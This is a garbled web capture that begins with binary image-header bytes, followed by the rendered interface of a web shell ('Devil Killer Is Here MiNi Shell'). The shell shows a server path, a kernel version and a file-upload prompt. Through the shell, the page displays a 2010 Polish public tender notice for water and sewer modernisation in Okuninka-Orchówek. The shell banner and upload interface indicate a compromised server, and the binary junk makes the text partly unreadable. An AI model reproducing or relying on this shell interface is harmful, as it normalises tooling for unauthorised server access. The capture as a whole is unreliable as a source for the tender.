JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100208/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100208/26913-N-2010.html

<p class="kh_header"><b>Orchówek: ROZBUDOWA I MODERNIZACJA WODOCIĄGÓW I KANALIZACJI W REGIONALNYM CENTRUM REKREACJI I WYPOCZYNKU WOJEWÓDZTWA LUBELSKIEGO  OKUNINKA-ORCHÓWEK</b><br>
<b>Numer ogłoszenia: 26913 - 2010; data zamieszczenia: 08.02.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Spółka Wodno-Ściekowa Jezioro Białe - Glinki zs. w Orchówku , ul. Nadbużańska 81, 22-200 Orchówek, woj. lubelskie, tel. 082 5721341, faks 082 5724080.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka prawa wodnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ROZBUDOWA I MODERNIZACJA WODOCIĄGÓW I KANALIZACJI W REGIONALNYM CENTRUM REKREACJI I WYPOCZYNKU WOJEWÓDZTWA LUBELSKIEGO  OKUNINKA-ORCHÓWEK.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienie realizowany jest w ramach projektu  pn.:	

ROZBUDOWA I MODERNIZACJA WODOCIĄGÓW I KANALIZACJI W REGIONALNYM CENTRUM REKREACJI I WYPOCZYNKU WOJEWÓDZTWA LUBELSKIEGO  OKUNINKA-ORCHÓWEK

składającego się z 5 zadań.
Przedmiot zamówienie obejmuje 3 zadania tj.:
  
ZADANIE NR 2 -
Rozbudowa i modernizacja sieci kanalizacji sanitarnej podciśnieniowej oraz przepompowni ścieków PI  próżniowo-tłocznej dla msc. Okuninka-Orchówek; 

Lokalizacja: msc. Okuninka, gm. Włodawa, pow. Włodawa, woj. lubelskie , 
		działki nr ewid.: 146/11, 146/1, 147, 214/12, 214/14, 214/5, 233, 247/2, 247/3, 247/4, 248/30, 248/51, 259, 261/2, 261/3, 262/9, 263/6, 264/7, 265/8, 274/48, 1418/1, 1419/7, 1420, 185/2, 138, 149, 152, 183, 145/2, 146/6, 224, 274/4, 192, 184, 148/2, 274/81, 445, 
w msc. Orchówek działka nr ewid. 541; 
II. Stan istniejący:
W msc. Okuninka funkcjonuje sieć kanalizacji   sanitarnej w systemie grawitacyjno-podciśnieniowym. Ścieki sanitarne są odprowadzane do istniejącej pompowni próżniowo-tłocznej PI zlokalizowanej w msc. Okuninka, a z niej ścieki są przetłaczane układem dwóch równoległych rurociągów tłocznych do systemu kanalizacyjnego w msc. Orchówek. Z istniejacej pompowni ścieków PII  ścieki są przetłaczane do kanalizacji sanitarnej w msc. Włodawa, a następnie do oczyszczalni ścieków.

Elementy do wykonania:
- Wykonanie  i modernizacja sieci kanalizacji sanitarnej podciśnieniowej w msc. Okuninka i  Orchówek ( J.Glinki ).
Zakres robót obejmuje:
a) wykonanie sieci kanalizacji sanitarnej podciśnieniowej w msc. Okuninka i Orchówek 
    ( J. Glinki ) o długości L= 4.281 m. ,
b) wykonanie dwóch przejść nad rzeką Tarasienka ,
c) wykonanie modernizacji istniejącej sieci kanalizacji sanitarnej podciśnieniowej (montaż armatury sieciowej);
- Modernizacja przepompowni ścieków próżniowo-tłocznej PI dla msc. Okuninka.
Zakres robót obejmuje:
a) wykonanie modernizacji części technologicznej- rozbudowa stacji pomp ,
b) wykonanie modernizacji instalacji elektrycznej wewnętrznej oraz układów sterowania i AKPiA ,
c)  modernizacja budynku technicznego z dyspozytornią -roboty budowlane ,
d) remont budynku przepompowni PI ,
e) przebudowa i modernizacja dróg i placów wewnętrznych na terenie pompowni PI. 

ZADANIE NR 4 -
Rozbudowa systemu monitoringu kanalizacji i wodociągów oraz zarządzania przedsiębiorstwem w msc. Okuninka-Orchówek. 


Lokalizacja: msc. Okuninka, gm. Włodawa, pow. Włodawa, woj. lubelskie , 
		działki nr ewid. 146/11, 146/1, 147, 214/12, 214/14, 214/5, 233, 247/2, 247/3, 247/4, 248/30, 248/51, 259, 261/2, 261/3, 262/9, 263/6, 264/7, 265/8, 274/48, 1418/1, 1419/7, 1420, 185/2, 138, 149, 152, 183, 145/2, 146/6, 224, 274/4, 192, 184, 148/2, 274/81, 445, 
w msc. Orchówek działka nr ewid. 541, 542, 544, 546, 545/36, 545/61, 545/63, 543/7, 1338, 545/4; 
Stan istniejący:
Na terenie przepompowni PI w Okunince w budynku energetycznym zlokalizowana jest centralna dyspozytornia monitoringu wyposażona w  szafę wizualizacji i komputer sterujący. Do centralnej dyspozytorni podłączone są :
- 23 funkcjonujące skrzynki sygnalizacyjno - monitorujące zlokalizowane przy istniejących komorach zaworowych sieci kanalizacji podciśnieniowej,
- przepompownie ścieków zlokalizowane wokół  j. Białego Pz1, Pz2, Pz3, Pz4 i PII w Orchówku
- stacje ujęcia wody - studnie głębinowe nr 2 i nr 3;

Elementy do wykonania:
-Rozbudowa i modernizacja monitoringu dla stacji wodociągowej oraz studni  Nr I,II,III,IV i V.
-Rozbudowa i modernizacja monitoringu dla kanalizacji podciśnieniowej 
a) rozbudowa dla nowej sieci kanalizacji podciśnieniowej wraz z komorami zaworowymi KZ w msc. Okuninka - Orchówek ( J.Glinki ) , L = 5817,0m.
b) modernizacja istniejących szafek przekaźnikowych przy istniejących studniach zaworowych KZ w Okunince szt. 23
- Przebudowa rozdzielni i wizualizacji w dyspozytorni  przepompowni ścieków PI w     Okunince 
-Przebudowa odcinka kabla sterowniczego pomiędzy pompowniami ścieków PI (Okuninka-J. Białe ) i PII ( Orchówek - J.Glinki );


ZADANIE NR 5 -

 Modernizacja (renowacja bezwykopowa) kolektora Dn 0,6-0,8 m w Orchówku (j.Glinki), L=419 m; 

Lokalizacja: msc. Orchówek, gm. Włodawa, pow. Włodawa, woj. lubelskie , 
	       działki nr ewid. 545/61, 540, 545/28; 

Stan istniejący:
Istniejąca sieć grawitacyjnej kanalizacji sanitarnej przebiegająca w msc. Orchówek na terenie zespołu rekreacyjnego nad j. Glinki wykonana jest z przewodów żelbetowych Dn 0,6-0,8 m. Na niektórych  odcinkach występują drobne uszkodzenia np. postaci nieszczelnych złączy lub włoskowatych rys na ściankach. Występują też nieszczelności w żelbetowych studzienkach kanalizacyjnych. Przed wykonaniem opracowania projektowego w kwietniu 2009 r. zostały wykonane prace przygotowawcze polegające na  oczyszczeniu całości sieci oraz wykonaniu inspekcji CCTV; 
Elementy do wykonania:
Uszczelnienie istniejącego kolektora kanalizacji sanitarnej o średnicach Dn 0,6 - 0,8 m wraz ze studzienkami kanalizacyjnymi na odcinku L= 419 m.
UWAGA : 
1.Szczegółowy zakres robót ujęty jest w projekcie wykonawczym, w przedmiarze robót oraz w Szczegółowych Specyfikacjach Technicznych i Instrukcjach BiOZ stanowiące załącznik do niniejszej specyfikacji w wersji elektronicznej na nośniku CD. Będą także do wglądu dla wykonawców w siedzibie Spółka Wodno - Ściekowa ,, Jezioro Białe- Glinki z/s w Orchówku , adres: Orchówek ul. Nadbużańska 81 , 22-200 Włodawa.
2.Wykonawca jest zobowiązany do zapewnienia obsługi geodezyjnej podczas prowadzenia robót i sporządzenia powykonawczej inwentaryzacji geodezyjnej przez uprawnioną  jednostkę geodezyjną zgodnie z §19, §20 i § 21 Rozporządzenia Ministra Gospodarki Przestrzennej i Budownictwa z dnia 21 lutego 1995 r. w sprawie rodzaju i zakresu opracowań geodezyjno-kartograficznych oraz czynności geodezyjnych obowiązujących w budownictwie (Dz. U. nr 25 z 1995 r. poz. 133). Dokumentacja geodezyjno-kartograficzna sporządzona w wyniku geodezyjnej inwentaryzacji powykonawczej musi zawierać dane umożliwiające wniesienie zmian na mapę zasadniczą, do ewidencji gruntów i budynków (wykaz zmian gruntowych) oraz do ewidencji sieci uzbrojenia terenu. Wykonawca przed przystąpieniem do wykonania robót budowlanych zobowiązany jest do opracowania i zatwierdzenia planu /BIOZ/ zgodnie z art. 21a ustawy z dnia 7 lipca 1994 r. /Prawo budowlane/ wraz z późniejszymi zmianami.
3.Ewentualne sprawy i koszty związane z zajęciem pasa drogowego i pasa rzeki Tarasienki na czas prowadzenia robót spoczywają na wykonawcy ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.13.00-8, 45.20.00.00-9, 42.96.10.00-0, 45.21.00.00-2, 45.45.31.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Ustala się wadium w wysokości :
Zadanie nr II.    -  45.000,00 zł
Zadanie nr IV    - 13.000,00 zł
Zadanie nr V     -  7.000,00 zł
Wadium w formie pieniężnej należy wnieść przelewem na rachunek bankowy Zamawiającego,  w Banku PEKAO S.A. I O/Włodawa nr konta
 59124022491111001022318348
z dopiskiem na blankiecie przelewu: /wadium na zabezpieczenie oferty przetargowej -  
ROZBUDOWA I MODERNIZACJA WODOCIĄGÓW I KANALIZACJI W REGIONALNYM CENTRUM REKREACJI I WYPOCZYNKU WOJEWÓDZTWA LUBELSKIEGO  OKUNINKA-ORCHÓWEK 
Zadanie nr _ Nazwa zadania _
Kserokopię dowodu przelewu potwierdzoną za zgodność z oryginałem należy dołączyć do oferty. 
2. Wadium może być wnoszone w jednej lub kilku następujących formach:
a) pieniądzu;
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c) gwarancjach bankowych;
d) gwarancjach ubezpieczeniowych;
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2  ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości. 
3. Za termin wniesienia wadium w formie przelewu pieniężnego przyjmuje się dzień i godzinę uznania kwoty wadium na rachunku Zamawiającego.
4. Wadium można wnieść do dnia, w którym upływa termin składania ofert, ale przed nadejściem godziny, do której powinny być złożone oferty.
5. Dokument w formie gwarancji i poręczenia winien zawierać stwierdzenie, że na pierwsze pisemne żądanie Zamawiającego wzywające do zapłaty kwoty odpowiadającej wysokości wadium, następuje jego bezwarunkowa wypłata bez jakichkolwiek zastrzeżeń.
6. W przypadku wniesienia wadium w formie, o której mowa w ust. 2 lit. b-e, do oferty należy dołączyć oryginał.
7. Wykonawca, który nie zabezpieczy oferty akceptowaną formą wadium zostanie przez Zamawiającego wykluczony z postępowania.
8.Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza,
9.Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy.
10. Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
11. Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium na podstawie ust. 8, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez zamawiającego
12. Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
13. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
14. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana: 
- nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
- odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
- zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
15. Wadium wniesione w formie gwarancji i poręczeń musi obejmować wszystkie przypadki, w których Wykonawca traci wadium na rzecz Zamawiającego. W przypadku, gdy dokumenty te nie będą zabezpieczały w pełnym zakresie możliwych roszczeń Zamawiającego Wykonawca zostanie wykluczony z postępowania.
16. W treści gwarancji i poręczeń  muszą być w szczególności zawarte następujące informacje:
1) nazwa i adres Zamawiającego;
2) oznaczenie numeru postępowania;
3) określenie przedmiotu zamówienia;
4) nazwę i adres Wykonawcy.
Wadium musi być wniesione najpóźniej do wyznaczonego terminu składania ofert. tj. do dnia 26.02.2010 r. do godz. 12.00</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek  jeśli posiada uprawnienia do wykonywania określonej działalności lub czynności w zakresie przedmiotu zamówienia
Ocena spełniania warunków udziału w postępowaniu o zamówienie publiczne przeprowadzona będzie w oparciu o złożone przez wykonawców oświadczenia i dokumenty zgodnie z formułą /spełnia - nie spełnia/.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek, jeśli wykonał w okresie ostatnich 5 lat przed upływem terminu składania ofert [tj. od dnia 26 luty 2005 r. do dnia 26 luty 2010 r.], a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie minimum dwóch robót budowlanych odpowiadających swoim rodzajem przedmiotowi zamówienia o wartości:
* dla zadania nr II o wartości min.  1 000 000 zł netto każda - Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków lub Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części w zakresie inżynierii ściekowej i wodnej;
* dla zadania nr IV o wartości min.  300 000 zł netto każda - Budowa lub modernizacja systemów monitoringu, sterowania i kontroli w zakresie sieci wodociągów i kanalizacji;
* dla zadania nr V  o wartości min.  200 000 zł netto każda; Roboty w zakresie uszczelnienia sieci kanalizacji sanitarnej.
Ocena spełniania warunków udziału w postępowaniu o zamówienie publiczne przeprowadzona będzie w oparciu o złożone przez wykonawców oświadczenia i dokumenty zgodnie z formułą /spełnia - nie spełnia/.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek w zakresie potencjału technicznego, jeśli są mu dostępne narzędzia i urządzenia w celu realizacji  niniejszego zamówienia w szczególności
A. ZADANIE NR II
1. Koparko - ładowarka-2 szt.
2. Koparka jednonaczyniowa kołowa 0,25 - 0,6 m3 - 2 szt.
3. Spycharka o mocy 55 kW - 2 szt.
4. Samochód samowyładowczy  o ładowności  5 - 7 t - 1 szt.
5. Żuraw samochodowy o udźwigu 5- 6 t - 1 szt.
6. Maszyna do wierceń poziomych -1 szt.
7. Zagęszczarki mechaniczne - 2 szt.
8. Samochód dostawczy 0,9 t - 1 szt.
9. Typowe szczelne szalunki skrzynkowe - 3 szt.
10. Zestaw igłofiltrowy do odwodnienia wykopów - 2 szt.
11. Zestaw pompowy do pompownia wody z wykopu - 2 szt.
12. Betoniarki o pojemności 100 - 200 l - 2 szt.
13. Maszyna do przecinania elementów betonowych - 1 szt.
B. ZADANIE NR IV
1. Koparko - ładowarka - 2 szt. 
2. Koparka łańcuchowa  kołowa -1 szt.
3. Spycharka o mocy 55 kW - 1 szt.
4. Samochód samowyładowczy  o ładowności  5 - 7 t - 1 szt.
5. Żuraw samochodowy o udźwigu 5- 6 t -1 szt.
6. Maszyna do wierceń poziomych  - 1 szt.
7. Zagęszczarki mechaniczne -1 szt.
8. Samochód dostawczy 0,9 t -1 szt.
B. ZADANIE NR V
1.Urządzenia specjalistyczne do montażu i utwardzania rękawa Dn 0,6-0,8 m. o długości niemniej niż 100 m. - 1 szt.
2. Wóz ciśnieniowy dwufunkcyjny -1 szt.
3. Kamera TV kolor z głowicą obrotową do inspekcji CCTV	1
4. Samochód skrzyniowy 5 - 7 t - 1 szt.
5. Samochód dostawczy 0,9 t -1 szt.
Ocena spełniania warunków udziału w postępowaniu o zamówienie publiczne przeprowadzona będzie w oparciu o złożone przez wykonawców oświadczenia i dokumenty zgodnie z formułą /spełnia - nie spełnia/.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek w zakresie potencjału osobowego, jeśli dysponuje osobami, które będą uczestniczyć w wykonaniu zamówienia odpowiedzialnych za kierowanie robotami budowlanymi  posiadającymi uprawnienia do wykonywania samodzielnych funkcji technicznych w budownictwie w specjalności:
*dla zadania nr II - instalacji i sieci sanitarnych bez ograniczeń; konstrukcyjno budowlanej bez ograniczeń; elektrycznej w zakresie instalacji i sieci bez ograniczeń; drogowej bez ograniczeń; 
*dla zadania nr IV - konstrukcyjno budowlanej bez ograniczeń; elektrycznej w zakresie instalacji i sieci bez ograniczeń; telekomunikacyjnej bez ograniczeń;
*dla zadania nr V -  instalacji i sieci sanitarnych bez ograniczeń
Ocena spełniania warunków udziału w postępowaniu o zamówienie publiczne przeprowadzona będzie w oparciu o złożone przez wykonawców oświadczenia i dokumenty zgodnie z formułą /spełnia - nie spełnia/.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek  jeśli:
a)posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę ubezpieczenia nie mniejszą niż 500 000 zł,
b)posiada środki finansowe na rachunku bankowym lub spółdzielczej kasy oszczędnościowo-kredytowej lub zdolność kredytową w wysokości co najmniej:
-zadania nr II - min. 500 000  zł,
- zadania nr IV - min. 200 000 zł,
- zadania nr V - min. 200 000 zł,
Ocena spełniania warunków udziału w postępowaniu o zamówienie publiczne przeprowadzona będzie w oparciu o złożone przez wykonawców oświadczenia i dokumenty zgodnie z formułą /spełnia - nie spełnia/.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)Harmonogram rzeczowo - finansowy realizacji i rozliczania wykonanych robot 
